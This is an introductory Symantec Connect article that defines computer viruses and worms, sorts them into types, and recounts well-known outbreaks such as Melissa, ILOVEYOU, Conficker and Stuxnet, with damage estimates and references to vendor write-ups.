Security 1:1 - Part 1 - Viruses and Worms

https://www.symantec.com/connect/articles/security-11-part-
1-viruses-and-worms

Welcome to the Security 1:1 series of articles

In Part 1 we start right off with Viruses and Worms - get to know the definitions and what
differentiates them. Nowadays both terms are quite often used interchangeable but there are
still differences between them. We look further more on the classifications and what are the
characteristics of each types. We will have a bit historical look at both known and most
devastating viruses and worms in the past.
I will provide you as well with references to Symantec write-ups about those threat where
both in-depth characteristics and removal processes can be checked. Throughout the series I
invite you as well to watch the youtube videos from Norton and Symantec channels
introducing various types of threats and attacks - those are shown in really informative
(sometimes as well funny) way and are very easy to understand.
The Security 1:1 series consist so far of following articles:
 Security 1:1 - Part 1 - Viruses and Worms
 Security 1:1 - Part 2 - Trojans and other security threats
 Security 1:1 - Part 3 - Various types of network attacks
1. Viruses
Virus - a malicious program able to inject its code into other programs/applications or data
files. After successful code replication the targeted areas become "infected". By definition
virus installation is done without user's consent and spreads in form of executable code
transferred from one host to another.. Purpose of viruses is very often of a harmful nature -
data deletion or corruption on the targeted host leading up to system in-operability in worst
case scenario.
Viruses can spread pretty fast over network, shares or removable media. On many occasions
the virus spread scenarios are connected with social engineering attacks, where end-users are
tricked to execute malicious links or download malicious files, in some other cases malicious
email attachments are being opened by end-users which ends in infection. Viruses as already
mentioned have as well ability to inject the code in other legitimate executable files - when
afterwards run by end-users - the virus code contained in the infected program is being
executed simultaneously. Viruses can take avail of known OS security vulnerabilities that
allow them to access the target host machines.
 Video - Symantec Guide to Scary Internet Stuff: Pests on Your PC - Viruses, Trojans &
Worms
Depending on virus "residence" we can classify viruses in following way:
 Resident Virus - virus that embeds itself in the memory on a target host. In such way it
becomes activated every time the OS starts or executes a specific action.
 Non-resident Virus - when executed this type of virus actively seeks targets for infections -
either on local, removable or network locations. Upon further infection it exits - this way is
not residing in the memory any more.
 Boot sector Virus - virus that targets specifically a boot sector (MBR) on the host's hard
drive. This type of viruses is being loaded to memory every time when an attempt is being
made to boot from the infected drive - this kind of viruses loads well before the OS loads.
Boot sector viruses were quite common in the 90s where the infection was spread mostly
through the infected floppy disks left in the bootable drives.
 Macro Virus - virus written in macro language, embedded in Word, Excel, Outlook etc.
documents. This type of viruses is being executed as soon as the document that contain it is
opened - this corresponds to the macro execution within those documents that under normal
circumstances is automatic.

A well-known example of a macro virus is Melissa (http://virus.wikia.com/wiki/Melissa)

virus [1999], very widespread in that time. The damage caused by it worldwide was
estimated on over 1.1 billion dollars. The creator of the virus David L. Smith was sentenced
in 2002 to 20 months in federal prison - the maximum sentence could have been much
higher though but David agreed to cooperate with federal authorities on finding other virus
and malware creators.
Reference:
http://www.symantec.com/security_response/writeup.jsp?docid=2000-122113-1425-99
W97M.Melissa.A (also known as W97M.Mailissa) is macro virus that has a payload to
email itself using MS Outlook. The subject of the e-mail is "Important Message From
USERNAME". Melissa is a typical macro virus which has an unusual payload. When a user
opens an infected document, the virus will attempt to e-mail a copy of this document to up to
50 other people, using Microsoft Outlook.
Another classification of viruses can result from their characteristics:
 File-infecting Virus (File-Infector) - classic form of virus. When the infected file is being
executed the virus seeks out other files on the host and infects them with malicious code. The
 malicious code is being inserted either at the begging of the host file code (prepending virus);
in the middle (mid-infector); or at the end (appending virus). A specific type of viruses called
"cavity virus" can even injects the code in the gaps in the file structure itself. The start point
of the file executions is changed to the start of the virus code to ensure that it is run when the
file is executed - afterwards the control may or may not be passed on to the original program
in turn. Depending on the infections routing the host file may become otherwise corrupted
and completely non-functional. More sophisticated viral forms allow though the host program
execution while trying to hide their presence completely (see polymorphic and metamorphic
viruses).
 Polymorphic Virus - this kind of viruses can change its own signature every time it
replicates and infects a new file in order to stay undetected from antivirus programs. Every
new variation of the virus is being achieved by using different encryption method each time
the virus file is being copied. This type of viruses is especially difficult in detection by any
detection programs due to the number of variants - sometimes going in hundreds or even
thousands.
 Metamorphic Virus - the virus is capable of changing its own code with each infection. The
rewriting process may cause the infection to appear different each time but the functionality
of the code remains the same. The metamorphic nature of this virus type makes it possible to
infect executables from two or more different operating systems or even different computer
architectures as well. The metamorphic viruses are ones of the most complex in build and
very difficult to detect.
 Stealth Virus - memory resident virus that utilises various mechanisms to avoid detection.
This avoidance can be achieved for example by removing itself from the infected files and
placing a copy of itself in a different location. The virus can also maintain a clean copy of the
infected files in order to provide it to the antivirus engine for scan, while the infected version
still remains undetected. Furthermore the stealth viruses are actively working to conceal any
traces of their activities and changes made to files.

The first known full-stealth Virus was "Brain" (http://virus.wikia.com/wiki/Brain) - a type

of boot infector. The virus monitors physical disk I/O and redirects any attempt on reading a
Brain-infected boot sector to where the original disk sector is stored.
 Armored Virus - very complex type of virus designed to make it's examination much more
difficult than in case of traditional viruses. By using various methods armored viruses can
also protect itself from antivirus software by fooling it into believing that the virus location is
somewhere else than real location - which of course makes the detection and removal process
more difficult.
 Multipartite Virus - virus that attempts to attack both the file executables as well as the
master boot record of the drive at the same time. This type may be tricky to remove as even
when the file executable part is clean it can re-infect the system all over again from the boot
sector if it wasn't cleaned as well.
 Camouflage Virus - virus type that is able to report as a harmless program to the antivirus
software. In such cases where the virus has similar code to the legitimate non-infected files
code the antivirus application is being tricked that is has to do with the legitimate program as
well - this would work only but in case of basic signature based antivirus software. As
nowadays antivirus solutions became more elaborate the camouflage viruses are quite rare
and not a serious threat due to the ease of their detection.
 Companion Virus - unlike traditional viruses the companion virus does not modify any files
but instead compromises the feature of DOS that allows executables with different extensions
(here .exe and .com) to be run with different priorities. This way where user tries to execute
 the legitimate "program" without specifying the extension itself and expects program.exe to
be run, the virus is run instead - with the program.com executable (as this one is first in the
alphabetical order). Companion virus is an older type and became increasingly rare since
introduction of Windows XP. Nowadays this kind of viruses can be still unintentionally run if
the host machine does not have the option for "show file extensions" activated and user
accidentally clicks the companion virus file.
 Cavity Virus - unlike tradition viruses the cavity virus does not attach itself to the end of the
infected file but instead uses the empty spaces within the program files itself (that exists there
for variety of reasons). This way the length of the program code is not being changed and the
virus can more easily avoid detection. The injection of the virus in most cases is not
impacting the functionality of the host file at all. The cavity viruses are quite rare though.

One good example of cavity virus is "Lenigh" (http://virus.wikia.com/wiki/Lehigh) - early

DOS cavity infector, that was specifically targeting command.com files and using unused
portions of the file's code.
2. Worms
Worm - this malicious program category is exploiting operating system vulnerabilities to
spread itself. In its design worm is quite similar to a virus - considered even its sub-class.
Unlike the viruses though worms can reproduce/duplicate and spread by itself - during this
process worm does not require to attach itself to any existing program or executable. In other
words it does not require any interaction for reproduction process - this capability makes
worm especially dangerous as they can spread and travel across network having a devastating
effect on both the host machines, servers as well consuming network bandwidth. More
invasive worms target to tunnel into the host system and from within to allow code execution
or remote control from the attacker. Some worms can as well include a viral component that
infects executable files.
The most common categorization of worms relies on the method how they spread:
 email worms: spread through email massages - especially through those with attachments
 internet worms: spread directly over the internet by exploiting access to open ports or system
vulnerabilities
 network worms: spread over open, unprotected network shares
 multivector worms: having two or more various spread capabilities
Some of the most known and destructive worms (by dates):
 Iloveyou [2000] (http://virus.wikia.com/wiki/Loveletter) - known also as Loveletter
Worm created by a student of computer university on Philippines. The worm was arriving in
email inboxes with the simple subject of “ILOVEYOU” and an attachment “LOVE-LETTER-
FOR-YOU.TXT.vbs”. The final ‘vbs’ extension was hidden, leading unsuspecting users to
think it was a text file. Upon opening the attachment, the worm sent a copy of itself to
everyone in the Windows Address Book and with the user’s sender address. It also made a
number of malicious changes to the user’s system. Symantec Security Response has
identified 82 variants of this worm.
More than 45 million computers around the globe have supposedly been infected by various
strains of the worm. The Ford Motor Company shut off its email system after being hit by the
worm. Some others affected were Silicon Graphics, the Department of Defense (including the
Pentagon), Daimler-Chrysler, The Motion Picture Association of America. Estimates of the
worm's damage: over $10 billion.
Reference:
[VBS.LoveLetter.Var]
http://www.symantec.com/security_response/writeup.jsp?docid=2000-121815-2258-99
 CodeRed and CodeRed II [2001] (http://virus.wikia.com/wiki/CodeRed)
Worm that targeted servers running the Microsoft IIS (Internet Information Server) Web
Server. The worm propagates by installing itself into a random Web server using a known
buffer overflow exploit, contained in the file Idq.dll. It contains the text string "Hacked by
Chinese!", which is displayed on web pages that the worm infected. The original CodeRed
had a payload that caused a Denial of Service (DoS) attack on the White House Web server.
CodeRed II has a different payload that allows its creator to have full remote access to the
Web server.
The reported cost of worm activities: $2 billion
Reference:
[CodeRed II]
http://www.symantec.com/security_response/writeup.jsp?docid=2001-080421-3353-99
 Sobig [2003] (http://virus.wikia.com/wiki/Sobig)
One of the most destructive worms ever. The worm sends itself to all the addresses it finds in
the .txt, .eml, .html, .htm, .dbx, and .wab files. It was able to send over a million copies of
itself within just a few hours of the outbreak. Sobig was the first of the spam botnet worms.
While some worms, like Tanatos, dropped trojans on the computers they infected, Sobig was
the first to turn computers into spam relays. The worm was stalling or completely crashing
Internet gateways and email servers worldwide.
Total estimated damage costs of the worm: $37 billion.
Reference:
[W32.Sobig.A@mm]
http://www.symantec.com/security_response/writeup.jsp?docid=2003-010913-1627-99
 Blaster [2003] (http://virus.wikia.com/wiki/Blaster) - known also as Lovesan
Blaster Worm is a worm that propagates by exploiting the Microsoft Windows DCOM RPC
Interface Buffer Overrun Vulnerability (BID 8205) affecting both Windows 2000 and
Windows XP machines. Once a computer was infected, it displayed a message box indicating
that the system would shut down in a couple of minutes. It has also a date triggered payload
that launches a DDoS attack against windowsupdate.com.
The Blaster worm shut down CTX, the largest railroad system in the Eastern U.S., for hours,
crippled the new Navy/Marine Corps intranet, shut down Air Canada's check-in system.
Overall estimated damage caused by the worm: $320 million.
Reference:
[W32.Blaster.Worm]
http://www.symantec.com/security_response/writeup.jsp?docid=2003-081113-0229-
99&tabid=2
 Sasser [2004] (http://virus.wikia.com/wiki/Sasser)
Sasser Worm is a worm that attempts to exploit the vulnerability described in Microsoft
Security Bulletin MS04-011. The worm was written by German Student of Computer Science.
It spreads by scanning the randomly selected IP addresses for vulnerable systems. When a
vulnerable system is found, a worm on the worm will send shell code to the target computer
that attempts to exploit the LSASS buffer overflow vulnerability. Sasser was exploiting the
same vulnerabilities used by Blaster - here as well Windows 2000 and XP affected. Sasser
also displayed a notice indicating that the system was shutting down.
Security experts estimate that infected computers numbered in the millions. British Airways
suffered delays when the worm hit Terminal Four at London's Heathrow Airport. Other
affected companies were Sampo Bank in Finnland, Deutsche Post, Delta Airlines Estimated,
British Coastguard, French Stock Exchange and the France Presse news agency. Damage
costs caused by the worm estimated to: $500 million.
 Reference:
[W32.Sasser.Worm]
http://www.symantec.com/security_response/writeup.jsp?docid=2004-050116-1831-99
 MyDoom [2004] (http://virus.wikia.com/wiki/Mydoom) - known also as Novarg
One of the most damaging email worms ever released. Worm was spreading as well through
the file sharing systam Kazaa. Worm was arriving as an attachment with the file extension
.bat, .cmd, .exe, .pif, .scr, or .zip. When a computer is infected, the worm sets up a backdoor
into the system by opening TCP ports 3127 through 3198, which can potentially allow an
attacker to connect to the computer and use it as a proxy to gain access to its network
resources.
The impact of the worm was experienced worldwide as it was able to cause slowdowns of
internet traffic. Estimated reported costs of the worm: $38 billion.
Reference:
[W32.Mydoom.A@mm]
http://www.symantec.com/security_response/writeup.jsp?docid=2004-012612-5422-99
 Conficker [2008] (http://virus.wikia.com/wiki/Conficker) - also known as Downadup
Downadup spreads primarily by exploiting the Microsoft Windows Server Service RPC
Handling Remote Code Execution Vulnerability MS08-067 (BID 31874), which was first
discovered in late-October of 2008. It scans the network for vulnerable hosts, but instead of
flooding it with traffic, it selectively queries various computers in an attempt to mask its
traffic instead. It also takes advantage of Universal Plug and Play to pass through routers and
gateways. It also attempts to spread to network shares by brute-forcing commonly used
network passwords and by copying itself to removable drives.
It has the ability to update itself or receive additional files for execution. It does this by
generating a large number of new domains to connect to every day. The worm may also
receive and execute files through a peer-to-peer mechanism by communicating with other
compromised computers, which are seeded into the botnet by the malware author.The worm
blocks access to predetermined security-related websites so that it appears that the network
request timed out. Furthermore, it deletes registry entries to disable certain security-related
software, prevent access to Safe Mode, and to disable Windows Security Alert notifications.
It has an extremely large infection base – estimated to be between 10-15 million computers.
This is largely attributed to the fact that it is capable of exploiting computers that are running
unpatched Windows XP SP2 and Windows 2003 SP1 systems. From interesting facts it is to
mention that the vulnerability that allowed Conficker to spread had been patched for a little
over a month before the worm appeared. Still, millions of computers were not updated.
Estimated damage cost of the worm: $9 billion.
Reference:
[W32.Downadup]
http://www.symantec.com/security_response/writeup.jsp?docid=2008-112203-2408-99
Simple steps to protect yourself from the Conficker Worm
http://www.symantec.com/business/support/index?page=content&id=TECH93179
 Stuxnet [2010]
The Stuxnet computer worm is perhaps the most complicated piece of malicious software
ever build.
The worm targets industrial control systems in order to take control of industrial facilities,
such as power plants. The ultimate goal of Stuxnet is to sabotage such facility by
reprogramming programmable logic controllers (PLCs) to operate as the attackers intend
them to, most likely out of their specified boundaries. Stuxnet was discovered in July, but is
confirmed to have existed at least one year prior and likely even before. The majority of
infections were found in Iran. While the attacker’s exact motives for doing so are unclear, it
has been speculated that it could be for any number of reasons with the most probable intent
being industrial espionage. Incredibly, Stuxnet exploits four zero-day vulnerabilities,
which is unprecedented.
Stuxnet was the first piece of malware to exploit the Microsoft Windows Shortcut 'LNK/PIF'
Files Automatic File Execution Vulnerability (BID 41732) in order to spread. The worm
drops a copy of itself as well as a link to that copy on a removable drive. When a removable
drive is attached to a system and browsed with an application that can display icons, such as
Windows Explorer, the link file runs the copy of the worm. Due to a design flaw in Windows,
applications that can display icons can also inadvertently run code, and in Stuxnet’s case,
code in the .lnk file points to a copy of the worm on the same removable drive. Furthermore,
Stuxnet also exploits the Microsoft Windows Server Service RPC Handling Remote Code
Execution Vulnerability (BID 31874), which was notably used incredibly successfully by
W32.Downadup (a.k.a Conficker), as well as the Microsoft Windows Print Spooler Service
Remote Code Execution Vulnerability (BID 43073). The worm also attempts to spread by
copying itself to network shares protected by weak passwords.
Reference:
[W32.Stuxnet]
http://www.symantec.com/security_response/writeup.jsp?docid=2010-071400-3123-99
The Hackers Behind Stuxnet
https://www-secure.symantec.com/connect/blogs/hackers-behind-stuxnet
W32.Stuxnet Dossier
http://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/w3
2_stuxnet_dossier.pdf
Stuxnet 0.5: The Missing Link
https://www-secure.symantec.com/connect/blogs/stuxnet-05-missing-link
http://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/stux
net_0_5_the_missing_link.pdf